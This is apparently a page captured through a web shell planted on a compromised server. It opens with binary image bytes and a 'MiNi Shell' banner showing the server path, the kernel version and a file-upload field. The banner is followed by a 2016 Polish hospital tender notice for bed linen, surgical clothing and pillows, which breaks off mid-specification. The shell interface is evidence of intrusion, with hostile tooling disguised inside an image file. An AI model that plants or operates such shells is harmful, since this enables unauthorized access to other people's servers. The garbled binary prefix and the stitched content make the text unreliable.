JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/40141-N-2016.html

<p class="kh_header"><b>Tarnowskie Góry: DOSTAWA BIELIZNY SZPITALNEJ</b><br>
<b>Numer ogłoszenia: 40141 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA BIELIZNY SZPITALNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje sukcesywne dostawy bielizny szpitalnej. Zamówienie składa się z 8 części, tzw.       pakietów      , z których każdy stanowi oddzielny przedmiot zamówienia       
Pakiet Nr 1      Bielizna pościelowa biała       
Pakiet Nr 2      Ubrania operacyjne dla Bloku Operacyjnego       
Pakiet Nr 3      Ubrania operacyjne dla sal zabiegowych endoskopii   urologicznej       
Pakiet Nr 4      Ubrania operacyjne dla OAiIT       
Pakiet Nr 5      Bielizna pościelowa dla sal operacyjnych i zabiegowych       
Pakiet Nr 6      Pidżamy dla pacjentów       
Pakiet Nr 7      Bielizna noworodkowa i niemowlęca       
Pakiet Nr 8      Poduszki.
Szczegółowy opis przedmiotu zamówienia, asortyment i ilości znajdują się w załącznikach [D] do SIWZ       Formularz cenowy       - pakiety 1-8.
Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w całym okresie wykonywania umowy będą posiadać aktualne świadectwa dopuszczenia do obrotu na rynku polskim zgodne z ustawą o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. nr 107 poz. 679 z 20.05.2010r.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie. Wszystkie oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe co do opakowania i przechowywania oraz posiadają pozwolenie dopuszczające daną serię do obrotu wydawaną każdorazowo przez uprawniony organ. 
Termin ważności nie krótszy niż 6 miesięcy od daty dostawy przedmiotu zamówienia do apteki szpitala.
Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno       in plus       jak i       in minus      , bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-  karta techniczna określająca parametry produktu, katalog lub folder w języku polskim dla każdego zaoferowanego produktu,  potwierdzający wymagane parametry  z zaznaczeniem nr Pakietu i jakiej pozycji Pakietu dotyczy, dokumenty zawierają informacje dotyczące materiału, gramatury i innych elementów niezbędnych do weryfikacji zgodności oferowanego przedmiotu zamówienia, 
- PRÓBKI (zgodnie z informacjami zawartymi w załączniku [D]),
- złożyć oświadczenie według załącznika [C] do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji dostaw - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b) numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
    c) nazwy handlowej produktu przy zachowaniu jego parametrów.
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  
    odpowiednikiem w przypadku:
a) gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
b) gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
c) w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem    
   faksem) uzgodnienia. Osobą upoważnioną do takich uzgodnień lub do akceptacji równoważnego produktu 
   ze strony Zamawiającego jest Naczelna pielęgniarka. Zmiany w tym zakresie nie wymagają 
   aneksów do umowy.
    d)  przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego 
4. Zmiana, o której mowa w ust. 3 będzie dopuszczalną pod warunkiem, iż odpowiednik będzie tożsamy z przedmiotem zamówienia  i przy cenie nie wyższej niż cena produktu objętego umową.
5.  Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
6. Zmiany umowy z wyjątkiem opisanych w pkt.2b niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział Zamówień Publicznych, budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 09:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Sekretariat, budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET  NR 1 - Bielizna pościelowa biała 100% bawełna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
Zamawiana ilość
1	Poszwa - kolor biały
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wymiar 160 x 200 cm
- bez guzików z zakładką 25 cm
- gramatura 170-175 g/m2
- temp. prania  95 st.C, 
- LOGO SZPITALA WTKANE - kolor granatowy
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA TARNOWSKIE GÓRY
   
	


.
100 szt.
2	Poszewka - kolor biały
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wymiar 70 x 80cm
- bez guzików z zakładką 25 cm
- gramatura 170-175 g/m2
- temp. prania  95 st.C, nici 100% bawełna
- LOGO SZPITALA WTKANE - kolor granatowy
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
     
	


100 szt.

3	Prześcieradło - kolor biały
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- wymiar 160 x 260 cm
- gramatura 170-175 g/m2
- temp. prania  95 st.C
- LOGO SZPITALA WTKANE - kolor granatowy
   WIELOSPECJALISTYCZNY  SZPITAL  POWIATOWY SA  TARNOWSKIE GÓRY
W górnej węższej części prześcieradło zszyte w tzw. zakładki-kapturek umożliwiający założenie na  materac  łóżka. Szerokość zakładki 30 cm	
100 szt.
W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:
1. Oferowany asortyment w postaci próbki materiału - Bielizna pościelowa biała 100% bawełna 
Próbka tkaniny wielkości ok. 40 x 40 cm o gramaturze 170 - 175 g/m2 , biała.
Na próbce musi być umieszczone logo wykonane metodą wymaganą w SIWZ (wtkane). Próbka może być z dowolnym napisem jako wzór.
2. Karta techniczna określająca parametry tkaniny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET  NR  2 - Ubrania operacyjne dla Bloku Operacyjnego kolor 100% bawełna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Ubranie operacyjne męskie - komplet bluza i spodnie
- kolor czerwony 
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz  
  na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : M  -  XXXL   	



40 szt

2	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor czerwony
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st.C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz  
  na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : S  -  XXL   	



60 szt
3	Koszula operacyjna - kolor biały
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st.C
- rozcięcie z przodu na zakładkę, dekolt w szpic, krótki rękaw
- troczki do wiązania z tasiemki bawełnianej - 6 szt. 
- długość za kolano
- nadrukowany motyw nazwy szpitala - kolor nadruku granatowy
   wykonany w górnej części koszulki
Rozmiar S - XXXL	


50 szt.
Uwaga: wycięcie w szpic winno zapewnić swobodne przełożenie głowy.


W CELU POTWIERDZENIA, IŻ PRZEDMIOT ZAMÓWIENIA ODPOWIADA  WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ  WYKONAWCA SKŁADA:

1. Oferowany asortyment w postaci próbki materiału - Ubrania operacyjne 100% bawełna 
    Próbka tkaniny wielkości 40 x 40 cm o gramaturze 165 - 170 g/m2 , kolor czerwony
    Próbka tkaniny wielkości 40 x 40 cm o gramaturze 165 - 170 g/m2 , kolor biały
    Na próbce musi być umieszczony nadrukowany motyw. Próbka może być z dowolnym napisem jako wzór.

2. Karta techniczna określająca parametry tkaniny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET  NR  3 -  Ubrania operacyjne dla sal zabiegowych endoskopii urologicznej kolor zielony  100% bawełna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	
                        Opis przedmiotu zamówienia 
       	
Zamawiana ilość
1	Ubranie operacyjne męskie - komplet bluza i spodnie
- kolor zielony
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st. C 
- możliwość chlorowania i sterylizacji 
- nadrukowany motyw nazwy szpitala na górnej kieszonce bluzy oraz  
  na spodniach w dowolnie wybranym miejscu - kolor nadruku granatowy
Bluza: z przodu karczek, wycięcie w szpic, trzy kieszenie- jedna na górze po lewej stronie, dwie kieszenie u dołu, rękaw krótki
Spodnie: proste z gumką w pasie
Rozmiar : M  -  XXL   	



35 szt

2	Ubranie operacyjne damskie - komplet bluza i spodnie
- kolor zielony
- tkanina 100% bawełna, sanforyzowana, nici 100% bawełna
- gramatura 165-170 g/m2
- temp. prania  95 st.C 
- możliwość chlorowania i sterylizacji 
